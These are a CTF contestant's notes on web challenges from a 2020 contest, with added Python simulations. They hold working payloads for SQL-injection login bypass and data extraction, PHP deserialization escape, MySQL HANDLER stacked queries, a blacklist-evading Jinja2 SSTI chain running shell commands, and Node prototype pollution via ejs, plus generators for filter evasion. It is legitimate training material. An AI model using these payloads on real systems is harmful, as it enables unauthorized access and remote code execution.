CTF Notes (1): iChunQiu 2020 Spring Festival Charity Contest [unfinished]

Preface

I had not planned to write CTF notes, but I keep forgetting things, so there is no way around it.

Simple Recruitment System (简单的招聘系统)

Knowledge point: "universal key" (SQL injection login bypass)
Target:
Payload:

Login:
lname=%27%3D0--+&lpass=
URL-decoded this is lname='=0-- : the quote closes the string, the remaining comparison lname=''=0 is evaluated left to right as (lname='')=0, which is true for every row whose lname is not empty, and the -- comment removes the password check.
Search (the result set has five columns, so every UNION SELECT carries five values):
' union select 1,database(),3,4,5;#
' union select 1,count(table_name),3,4,5 from information_schema.tables where table_schema='nzhaopin';#
' union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name='flag' and table_schema='nzhaopin';#
' union select 1,flaaag,3,4,5 from flag;#
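The login bypass and the UNION extraction above, replayed end to end as an added example (not the challenge's code). It assumes the challenge builds both queries by string concatenation and uses an in-memory SQLite database with constructed data as a stand-in for nzhaopin: the flag table and its flaaag column come from the page, the users table, its column names and the sample rows are assumptions, and the MySQL-only pieces are swapped (sqlite_master for information_schema, -- for #, no database()).

```python
import sqlite3

# Constructed stand-in for the challenge's nzhaopin database.
SCHEMA = """
CREATE TABLE users(id INTEGER, lname TEXT, lpass TEXT, email TEXT, role TEXT);
INSERT INTO users VALUES (1, 'admin', 'S3cret!', 'admin@example.test', 'hr');
INSERT INTO users VALUES (2, 'bob',   'hunter2', 'bob@example.test',   'user');
CREATE TABLE flag(id INTEGER, flaaag TEXT);
INSERT INTO flag VALUES (1, 'flag{constructed-sample}');
"""

UNIVERSAL_KEY = "'=0-- "   # the page's lname=%27%3D0--+ after URL decoding


def make_db():
    db = sqlite3.connect(':memory:')
    db.executescript(SCHEMA)
    return db


def login_vulnerable(db, lname, lpass):
    """Assumed shape of the challenge's login query: string concatenation.
    With UNIVERSAL_KEY it becomes WHERE lname=''=0-- ' AND lpass='' and
    (lname='')=0 holds for every row, so every user matches."""
    sql = "SELECT id, lname FROM users WHERE lname='%s' AND lpass='%s'" % (lname, lpass)
    return db.execute(sql).fetchall()


def login_fixed(db, lname, lpass):
    """Same query with bound parameters: the payload is compared as data."""
    sql = "SELECT id, lname FROM users WHERE lname=? AND lpass=?"
    return db.execute(sql, (lname, lpass)).fetchall()


def search_vulnerable(db, term):
    """Five-column search, the shape the page's UNION SELECT 1,..,5 payloads need."""
    sql = "SELECT id, lname, lpass, email, role FROM users WHERE lname='%s'" % term
    return db.execute(sql).fetchall()


def count_columns(db, limit=32):
    """ORDER BY n probing: the first n that errors is one past the column count."""
    for n in range(1, limit + 1):
        try:
            search_vulnerable(db, "' ORDER BY %d--" % n)
        except sqlite3.OperationalError:
            return n - 1
    return limit


def list_tables(db):
    """The page's information_schema step, against SQLite's catalog table."""
    rows = search_vulnerable(
        db, "' UNION SELECT 1, group_concat(name), 3, 4, 5 "
            "FROM sqlite_master WHERE type='table'--")
    return sorted(rows[0][1].split(','))


def dump_flag(db):
    """The page's last step: read flag.flaaag through the second column."""
    rows = search_vulnerable(db, "' UNION SELECT 1, flaaag, 3, 4, 5 FROM flag--")
    return [r[1] for r in rows]


if __name__ == '__main__':
    db = make_db()
    print(login_vulnerable(db, UNIVERSAL_KEY, ''))   # every user
    print(login_fixed(db, UNIVERSAL_KEY, ''))        # nothing
    print(count_columns(db), list_tables(db), dump_flag(db))
```

The fix is the one-line change in login_fixed: once the value is bound as a parameter, the quote and comment are just characters in a username and the WHERE clause keeps its shape.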
babyPHP

Knowledge point: PHP deserialization string escape (the "overflow" of the original: a filter that lengthens the serialized string after serialize() has already written the s:N: length prefixes)
Target: http://server.icystal.top/index.php
Reference: https://www.cnblogs.com/wangtanzhi/p/11908422.html
Payload:

# the object tree to smuggle in; it opens with the "; that closes the padded age string
payload = '";s:8:"nickname";O:4:"User":2:{s:3:"age";s:76:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username="admin"";s:8:"nickname";O:4:"Info":3:{s:3:"age";s:1:"1";s:8:"nickname";s:1:"2";s:8:"CtrlCase";O:6:"dbCtrl":2:{s:8:"password";s:1:"1";s:4:"name";s:5:"admin";}}}s:8:"CtrlCase";N;}'
# each 'alter' presumably grows by one byte in the server's filter, so len(payload) copies move the declared end of age exactly to where payload begins
payload='age='+'alter'*len(payload)+payload
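An added simulation of that escape, not the challenge's code. The page does not show the server, so the following are assumptions: age and nickname are stored in a User object with public properties age, nickname and CtrlCase; the object is serialize()d and then run through a str_replace() that turns every 'alter' into a six-byte word (the replacement word itself is assumed); and unserialize() ignores trailing bytes after the first complete value, which PHP does. The parser below is a minimal re-implementation of unserialize() for N, i, s and O values, enough to show that the padded input parses into the injected object tree.

```python
FILTER_OLD = 'alter'
FILTER_NEW = 'hacker'   # assumed; any replacement one byte longer behaves the same

# The page's payload verbatim.
PAGE_PAYLOAD = ('";s:8:"nickname";O:4:"User":2:{s:3:"age";s:76:"select 1,'
                '"c4ca4238a0b923820dcc509a6f75849b" from user where username="admin"";'
                's:8:"nickname";O:4:"Info":3:{s:3:"age";s:1:"1";s:8:"nickname";s:1:"2";'
                's:8:"CtrlCase";O:6:"dbCtrl":2:{s:8:"password";s:1:"1";s:4:"name";'
                's:5:"admin";}}}s:8:"CtrlCase";N;}')


def php_serialize_user(age, nickname):
    """Assumed server output for serialize(new User($age, $nickname))."""
    return ('O:4:"User":3:{s:3:"age";s:%d:"%s";s:8:"nickname";s:%d:"%s";'
            's:8:"CtrlCase";N;}' % (len(age), age, len(nickname), nickname))


def php_unserialize(data, pos=0):
    """Minimal unserialize() for N, i, s and O; returns (value, next_pos).
    Objects come back as dicts with a '__class' key. Strings are read by the
    declared byte count, never by looking for the closing quote."""
    tag = data[pos]
    if tag == 'N':
        return None, pos + 2
    if tag == 'i':
        end = data.index(';', pos)
        return int(data[pos + 2:end]), end + 1
    if tag == 's':
        colon = data.index(':', pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                          # skip ':"'
        value = data[start:start + length]
        if data[start + length:start + length + 2] != '";':
            raise ValueError('string terminator missing at %d' % pos)
        return value, start + length + 2
    if tag == 'O':
        colon = data.index(':', pos + 2)
        name_len = int(data[pos + 2:colon])
        name = data[colon + 2:colon + 2 + name_len]
        p = colon + 2 + name_len + 2               # skip '":'
        colon2 = data.index(':', p)
        count = int(data[p:colon2])
        p = colon2 + 2                             # skip ':{'
        obj = {'__class': name}
        for _ in range(count):
            key, p = php_unserialize(data, p)
            obj[key], p = php_unserialize(data, p)
        if data[p] != '}':
            raise ValueError('object not closed at %d' % p)
        return obj, p + 1
    raise ValueError('unsupported tag %r at %d' % (tag, pos))


def padding_for(payload, old=FILTER_OLD, new=FILTER_NEW):
    """Padding that grows by exactly len(payload) bytes after the filter, so the
    stale s:N: count ends right where the injected structure begins. The page's
    'alter'*len(payload) is the delta == 1 case of this."""
    delta = len(new) - len(old)
    if delta <= 0:
        raise ValueError('the filter must make the string longer')
    if len(payload) % delta:
        raise ValueError('lengthen the payload to a multiple of %d bytes' % delta)
    return old * (len(payload) // delta)


def run_escape(payload, old=FILTER_OLD, new=FILTER_NEW):
    """Submit age = padding + payload, apply the server's filter, unserialize."""
    age = padding_for(payload, old, new) + payload
    stored = php_serialize_user(age, 'x').replace(old, new)   # the server-side filter
    obj, _ = php_unserialize(stored)
    return obj


if __name__ == '__main__':
    user = run_escape(PAGE_PAYLOAD)
    print(user['nickname']['age'])                          # the injected SQL
    print(user['nickname']['nickname']['CtrlCase']['name'])  # admin
```

The check that matters is the first string after the filter: its s:N: prefix still says the pre-filter length, the parser reads exactly that many bytes, and those bytes are now the grown padding alone, so the "; that opens the payload is taken as the end of age and everything after it is parsed as further properties of the outer object.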
sqlicopy

Knowledge point: reportedly wide-byte injection plus stacked queries
Target: http://server.icystal.top/sqlicopy.php
Reference: https://blog.csdn.net/qq_40648358/article/details/104456748
Payload: not solved
Blacklist

Knowledge point: MySQL HANDLER statement (reads table rows when SELECT is blacklisted)
Target: https://buuoj.cn/challenges#[GYCTF2020]Blacklist
References:
https://www.cnblogs.com/chrysanthemum/p/11657008.html
https://blog.csdn.net/qq_26406447/article/details/90643951
https://blog.csdn.net/weixin_40871137/article/details/94349532
Payload:

?inject=';show tables;show columns from FlagHere;handler FlagHere open as h;handler h read first;--
The injection point accepts stacked queries: show tables and show columns reveal the FlagHere table and its columns, then HANDLER opens the table under the alias h and read first returns its first row without a SELECT.
Ezsqli

Knowledge point: blind SQL injection without the keyword in
FlaskAPP

Knowledge point: Jinja2 template injection (SSTI)
Target:
Payload:
{{().__class__.__bases__[0].__subclasses__()[78].__init__.__globals__['__builtins__']['ev'+'al']('__im'+'port__("o'+'s").po'+'pen("cat this_is_the_fl'+'ag.txt")').read()}}
The index 78 into __subclasses__() is specific to the target's interpreter and has to be found again on any other host; the pieces 'ev'+'al', '__im'+'port__', 'o'+'s', 'po'+'pen' and 'fl'+'ag' are concatenated at render time so that no blacklisted word appears in the submitted template.
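What that payload does, as an added example that is not the challenge's code. Jinja2 attribute and item access resolve to the same Python objects, so the expression between {{ }} can be evaluated by plain Python here with no Flask or Jinja2 installed. gadget_index() finds the equivalent of the hard-coded 78 for the running interpreter, and fragment() produces the 'ev'+'al' style splitting for any word list; the BANNED list is an assumption, the page does not show the challenge's filter.

```python
SUBCLASSES_EXPR = '().__class__.__bases__[0].__subclasses__()'
BANNED = ['eval', 'import', 'os', 'popen', 'flag']   # assumed filter list


def gadget_index():
    """First index into object.__subclasses__() whose __init__ is a Python-level
    function carrying the builtins dict in its globals. The page hard-codes 78
    for the target; the number depends on the interpreter and its imports."""
    for i, cls in enumerate(().__class__.__bases__[0].__subclasses__()):
        try:
            g = getattr(getattr(cls, '__init__', None), '__globals__', None)
        except Exception:
            continue
        if isinstance(g, dict) and isinstance(g.get('__builtins__'), dict):
            return i
    raise LookupError('no usable gadget class')


def fragment(source, banned):
    """Quote `source` as pieces joined with '+', cutting every banned word in
    half so no piece contains it (the page's 'ev'+'al', 'po'+'pen', 'fl'+'ag').
    The pieces concatenate back to `source` when the template is rendered."""
    cuts = set()
    for word in banned:
        start = source.find(word)
        while start != -1:
            cuts.add(start + len(word) // 2)
            start = source.find(word, start + 1)
    bounds = [0] + sorted(cuts) + [len(source)]
    return '+'.join(repr(source[a:b]) for a, b in zip(bounds, bounds[1:]) if a != b)


def build_payload(index, sink_source, suffix=''):
    """Expression in the page's shape: walk from a tuple to the gadget class,
    reach eval through its globals and hand it `sink_source`."""
    return "%s[%d].__init__.__globals__['__builtins__'][%s](%s)%s" % (
        SUBCLASSES_EXPR, index, fragment('eval', BANNED),
        fragment(sink_source, BANNED), suffix)


def run_expression(expr):
    """Stand-in for the template engine rendering {{ expr }}."""
    return eval(expr)


if __name__ == '__main__':
    idx = gadget_index()
    # The page's sink with its constructed file name, regenerated for this host:
    print('{{' + build_payload(
        idx, '__import__("os").popen("cat this_is_the_flag.txt")', '.read()') + '}}')
    # A harmless sink proves the chain reaches eval without touching a shell:
    print(run_expression(build_payload(idx, '"ss"+"ti"')))
```

The defence that fits the page's scenario is never rendering user input as a template (render with it as a variable instead); a jinja2.sandbox.SandboxedEnvironment additionally refuses the __class__ and __globals__ steps of this walk.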
Ez_Express

Knowledge point: JS prototype pollution + a letter-case trick + the ejs template source
Register and log in with:
username=admın
The dotless ı (U+0131) upper-cases to the ASCII letter I, so admın passes a check against the literal string admin yet becomes ADMIN after toUpperCase().
action:
Content-Type: application/json
{"__proto__":{"outputFunctionName":"a;global.process.mainModule.require('child_process').exec('cat /flag > /app/public/flag\"');//"}}
The JSON body is merged into Object.prototype, so ejs later finds an outputFunctionName option on every object; ejs pastes that option into the JavaScript source of the compiled template, and the injected statement runs on the next render, copying /flag into the web-served public directory.
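The letter-case trick generalised, as an added example that is not part of the original write-up: a scan for every character in the Basic Multilingual Plane that turns into plain ASCII letters under upper- or lower-casing, and a generator of spoofed spellings for a banned word. It assumes that JavaScript's toUpperCase()/toLowerCase() and Python's str.upper()/lower() agree on these simple one-character mappings, which they do since both follow the Unicode case mapping tables.

```python
def ascii_case_collisions(limit=0x10000):
    """{char: ascii_letters} for every non-ASCII BMP character whose upper()
    or lower() form consists of ASCII letters only (ı -> I, ſ -> S, K -> k, ...)."""
    hits = {}
    for cp in range(0x80, limit):
        ch = chr(cp)
        for mapped in (ch.upper(), ch.lower()):
            if mapped != ch and mapped.isascii() and mapped.isalpha():
                hits[ch] = mapped
    return hits


def spoofs(word, collisions):
    """Variants of `word` with one letter replaced by a character that case-maps
    onto it. Each variant differs from `word` as a string (so an exact ban on
    `word` lets it through) but collapses into a case form of `word` once the
    server normalises case."""
    out = []
    for i, letter in enumerate(word):
        for src, dst in collisions.items():
            if len(dst) == 1 and dst.lower() == letter.lower():
                out.append(word[:i] + src + word[i + 1:])
    return out


if __name__ == '__main__':
    table = ascii_case_collisions()
    for variant in spoofs('admin', table):
        print(variant, variant.upper(), variant.lower())
```

The practical check for an application is the order of operations: compare against the blocked name after the same normalisation the rest of the code applies, or reject any username that is not ASCII to begin with.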
node game

Knowledge point: Node.js http.get SSRF
Target: https://buuoj.cn/challenges#[GYCTF2020]Node%20Game
References:
https://xz.aliyun.com/t/2894
http://blog.5am3.com/2020/02/11/ctf-node1/
Payload: not solved; pasting a payload from a group member to study later

Easter egg (彩蛋) ∑(っ°Д°;)っ
